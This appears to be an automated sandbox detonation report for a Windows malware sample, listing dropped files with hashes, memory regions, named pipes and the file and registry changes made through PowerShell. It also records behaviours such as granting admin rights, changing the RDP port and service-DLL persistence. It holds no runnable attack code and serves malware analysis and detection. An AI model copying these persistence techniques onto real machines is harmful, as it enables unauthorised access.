SHA512 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

memory/1880-78-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\4ollxdjq\CSCD430DA36425C492D97B3F7169A39AFC7.TMP

MD5 80c76621bec505be239d2b1878cef6a1
SHA1 6e4243610eff9e8fc7382946b3b9b30a8cf02ebc
SHA256 bc0171b6a2bfb6e93ede410f94fcd11e3ec6465f1327117a7155f27021e2b6ee
SHA512 035f1a8eac02941a21bda12aa5dd242288eeb5d72092fc20d0f853de72767cc468867ac97201d88204c43b1eb387659b6b80b4f409dede7cd71b9bd132beb0d8

C:\Users\Admin\AppData\Local\Temp\RES620D.tmp

MD5 5b8a94dfda8c7e90f27aaf735f458be1
SHA1 05f42ee946d3e77e1e45b7ce81dc0489616eeeae
SHA256 583bf5969033ec2e83d9ec8f36112b91def284c7dca749753f2b18e75872a1f3
SHA512 50464838c3582eb3ef863aad40ab14b50447f50a68d1ae6ba20fc8853fcd7bf52f9bf19ae7b87dd187c96e081b9f8ea77b26457984d29315b608f0e9c21c83e4

C:\Users\Admin\AppData\Local\Temp\4ollxdjq\4ollxdjq.dll

MD5 98cf504ea3f4bd519eefc9c1bc49d5f8
SHA1 5bdc66329a762fa4c81e3d5e5e82c2136e1d139a
SHA256 c04bd3cfe59a27bd1e6adb95a1fa63a195fa1a4828c37e91f8c0f66471540cc8
SHA512 d17156dc0788aec18e212d93836dcad1e9efa25db0d9acc9353efd78ce8d0c63cbe4d1901533d4c00ce7f737ae1d7b68eea3e180a17e6107d2dbbec83cdf9701

memory/568-82-0x0000000002420000-0x0000000002421000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

MD5 43473f4e719958639a9d89e5d8388999
SHA1 ccb79eb606a23daa4b3ff8f996a2fbf281f31491
SHA256 ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734
SHA512 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa

memory/568-84-0x000000001B690000-0x000000001B691000-memory.dmp

memory/568-85-0x000000001B7B0000-0x000000001B7B1000-memory.dmp

memory/568-86-0x000000001B4D0000-0x000000001B4D1000-memory.dmp

memory/1372-87-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 78030f8214f9aee63258fef119445881
SHA1 d8ebc69c3ebfce88a8010b1c40ffe3c1fb8932d9
SHA256 0d4b1b677658a2590720cb7c62732d62de52499e8f7f7aa70aea6e4c412163f6
SHA512 a4d852a5a5e20050dcb414cfd27e301b7005a8a100edc289326c6529edeee455f8e37bf9222619ee65cd0622590f9b2c79e6b3410438f23d498c03d572a80e0b

memory/1372-92-0x000000001AC80000-0x000000001AC82000-memory.dmp

memory/1372-93-0x000000001AC84000-0x000000001AC86000-memory.dmp

memory/1372-95-0x0000000002440000-0x0000000002441000-memory.dmp

memory/1372-97-0x000000001B730000-0x000000001B731000-memory.dmp

memory/1372-99-0x00000000026A0000-0x00000000026A1000-memory.dmp

memory/1372-100-0x0000000001E20000-0x0000000001E21000-memory.dmp

memory/568-101-0x000000001AA2A000-0x000000001AA49000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 13ae3d1b91f093a5999e0701e1e017e0
SHA1 6b357e3e27c09c2153460392efbac9076f2f2ef7
SHA256 c85e996edc262b5472aa839a2887f796c5a155673b7a95a45a56c4c9ad398078
SHA512 3e3b016dc6724db45fd9ea379426647cc4f730d581219498b5926dcd08dfd5f8167cf3d7123d03c0629610892bc1f773eba8a6d37def674fa2837a5dd5373faf

memory/1372-106-0x000000001A9D0000-0x000000001A9D1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4de183f2-8fd1-4dd9-8a1f-7a37a5677403

MD5 6f0d509e28be1af95ba237d4f43adab4
SHA1 c665febe79e435843553bee86a6cea731ce6c5e4
SHA256 f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA512 8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

memory/1372-119-0x0000000002940000-0x0000000002941000-memory.dmp

memory/1372-120-0x000000001AA10000-0x000000001AA11000-memory.dmp

memory/1068-121-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 78030f8214f9aee63258fef119445881
SHA1 d8ebc69c3ebfce88a8010b1c40ffe3c1fb8932d9
SHA256 0d4b1b677658a2590720cb7c62732d62de52499e8f7f7aa70aea6e4c412163f6
SHA512 a4d852a5a5e20050dcb414cfd27e301b7005a8a100edc289326c6529edeee455f8e37bf9222619ee65cd0622590f9b2c79e6b3410438f23d498c03d572a80e0b

memory/1068-127-0x0000000002410000-0x0000000002411000-memory.dmp

memory/1068-129-0x000000001B8C0000-0x000000001B8C1000-memory.dmp

memory/1068-131-0x000000001AB20000-0x000000001AB21000-memory.dmp

memory/1068-132-0x0000000002060000-0x0000000002061000-memory.dmp

memory/1068-133-0x000000001A9A0000-0x000000001A9A2000-memory.dmp

memory/1068-134-0x000000001A9A4000-0x000000001A9A6000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 a5c4680958b359e37af267fe756e9ff8
SHA1 83315fa34dd9d376a97a8971706c14000d52875e
SHA256 abb6dc1cdbaabcc623402d0fbc23ff9633fa9c0c4a0769f76c05701f0f921734
SHA512 15331887f13c6486880676ca6020fb86482747913dcb19dce43798f9fb7c64cf0453b5f85b50a89253f9594310836d66360607ecf21088add68741ad19dafc41

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dd1881c1-3172-475a-91fd-bd5d74f197c9

MD5 a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA1 81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256 dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA512 8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e7386bbd-3382-41d3-bcf3-bc577bd6a777

MD5 faa37917b36371249ac9fcf93317bf97
SHA1 a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256 b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512 614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_98339e7e-4519-421e-a67f-018a14782935

MD5 7f79b990cb5ed648f9e583fe35527aa7
SHA1 71b177b48c8bd745ef02c2affad79ca222da7c33
SHA256 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA512 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ba983134-4a5b-409a-b352-c80e0f0f7332

MD5 e5b3ba61c3cf07deda462c9b27eb4166
SHA1 b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256 b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512 a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cbdf60f4-d62b-47ae-95d0-49a08733d431

MD5 d89968acfbd0cd60b51df04860d99896
SHA1 b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA256 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512 b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f75b123-4949-4b56-8c39-e151aafcbbbd

MD5 2d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1 ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256 ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512 edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

memory/1164-142-0x0000000000000000-mapping.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 78030f8214f9aee63258fef119445881
SHA1 d8ebc69c3ebfce88a8010b1c40ffe3c1fb8932d9
SHA256 0d4b1b677658a2590720cb7c62732d62de52499e8f7f7aa70aea6e4c412163f6
SHA512 a4d852a5a5e20050dcb414cfd27e301b7005a8a100edc289326c6529edeee455f8e37bf9222619ee65cd0622590f9b2c79e6b3410438f23d498c03d572a80e0b

memory/1164-150-0x000000001AC04000-0x000000001AC06000-memory.dmp

memory/1164-149-0x000000001AC00000-0x000000001AC02000-memory.dmp

\??\PIPE\wkssvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/568-158-0x000000001C6F0000-0x000000001C6F1000-memory.dmp

memory/1592-159-0x0000000000000000-mapping.dmp

C:\Windows\system32\rfxvmt.dll

MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

memory/1568-161-0x0000000000000000-mapping.dmp

memory/620-162-0x0000000000000000-mapping.dmp

memory/1680-163-0x0000000000000000-mapping.dmp

memory/1964-164-0x0000000000000000-mapping.dmp

memory/1100-165-0x0000000000000000-mapping.dmp

memory/1712-166-0x0000000000000000-mapping.dmp

memory/1780-167-0x0000000000000000-mapping.dmp

memory/940-168-0x0000000000000000-mapping.dmp

memory/892-169-0x0000000000000000-mapping.dmp

memory/1472-170-0x0000000000000000-mapping.dmp

memory/1256-171-0x0000000000000000-mapping.dmp

memory/1312-172-0x0000000000000000-mapping.dmp

memory/1664-173-0x0000000000000000-mapping.dmp

memory/1392-174-0x0000000000000000-mapping.dmp

memory/1896-175-0x0000000000000000-mapping.dmp

memory/1520-176-0x0000000000000000-mapping.dmp

memory/1608-177-0x0000000000000000-mapping.dmp

memory/844-178-0x0000000000000000-mapping.dmp

memory/748-179-0x0000000000000000-mapping.dmp

memory/1020-180-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 271eacd9c9ec8531912e043bc9c58a31
SHA1 c86e20c2a10fd5c5bae4910a73fd62008d41233b
SHA256 177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934
SHA512 87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0

\Windows\Branding\mediasvc.png

MD5 1fa9c1e185a51b6ed443dd782b880b0d
SHA1 50145abf336a196183882ef960d285bd77dd3490
SHA256 f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959
SHA512 16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc

memory/1692-183-0x0000000000000000-mapping.dmp

memory/620-184-0x0000000000000000-mapping.dmp

memory/1168-185-0x0000000000000000-mapping.dmp

memory/1100-186-0x0000000000000000-mapping.dmp

\??\PIPE\samr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/892-188-0x0000000000000000-mapping.dmp

memory/328-189-0x0000000000000000-mapping.dmp

memory/1096-190-0x0000000000000000-mapping.dmp

memory/1804-191-0x0000000000000000-mapping.dmp

\??\PIPE\lsarpc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\PIPE\samr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1688-194-0x0000000000000000-mapping.dmp

memory/1692-195-0x0000000000000000-mapping.dmp

\??\PIPE\samr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1600-197-0x0000000000000000-mapping.dmp

memory/1964-198-0x0000000000000000-mapping.dmp

\??\PIPE\samr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/328-200-0x0000000000000000-mapping.dmp

memory/692-201-0x0000000000000000-mapping.dmp

memory/1656-202-0x0000000000000000-mapping.dmp

memory/940-203-0x0000000000000000-mapping.dmp

memory/940-209-0x0000000019360000-0x0000000019362000-memory.dmp

memory/940-210-0x0000000019364000-0x0000000019366000-memory.dmp

memory/940-239-0x000000001936A000-0x0000000019389000-memory.dmp

memory/1372-240-0x0000000000000000-mapping.dmp

memory/1632-241-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-07-20 09:16

Reported

2021-07-20 09:19

Platform

win10v20210410

Max time kernel

49s

Max time network

113s

Command Line

"C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe"

Signatures

Grants admin privileges

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_kjkza3sr.cco.ps1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4B29.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4B2A.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4B3A.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4B4B.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_lish24en.kit.psm1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4B09.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 339704ea112ed701 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
